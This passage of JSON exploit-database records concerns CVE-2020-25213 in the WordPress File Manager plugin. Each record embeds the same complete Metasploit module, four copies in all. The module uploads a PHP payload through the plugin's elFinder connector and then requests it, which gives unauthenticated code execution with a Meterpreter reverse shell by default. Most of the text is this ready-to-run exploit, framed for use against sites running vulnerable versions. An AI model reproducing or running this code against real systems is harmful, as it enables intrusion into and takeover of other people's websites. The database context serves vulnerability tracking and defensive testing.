"integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-28T02:20:11", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-10-28T02:20:11", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-10-28T02:20:11", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-28] #", "category": "", "verified": false}, "lastseen": "2021-10-28T02:20:11", "differentElements": ["sourceData"], "edition": 54}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "677abf3343aa1758d24f4d553bfbe304", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-28T22:14:32", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-10-28T22:14:32", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-10-28T22:14:32", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-29] #", "category": "", "verified": false}, "lastseen": "2021-10-28T22:14:32", "differentElements": ["sourceData"], "edition": 55}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "dce72e6372dc25c88e953902443dafe0", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-30T00:23:04", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-10-30T00:23:04", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-10-30T00:23:04", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-30] #", "category": "", "verified": false}, "lastseen": "2021-10-30T00:23:04", "differentElements": ["sourceData"], "edition": 56}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "499c181e8c5c67dc2d00beb6e34a3fee", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-31T08:17:11", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-10-31T08:17:11", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-10-31T08:17:11", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-31] #", "category": "", "verified": false}, "lastseen": "2021-10-31T08:17:11", "differentElements": ["sourceData"], "edition": 57}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "8b3933b073cb2df270ede6d6211bd404", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", 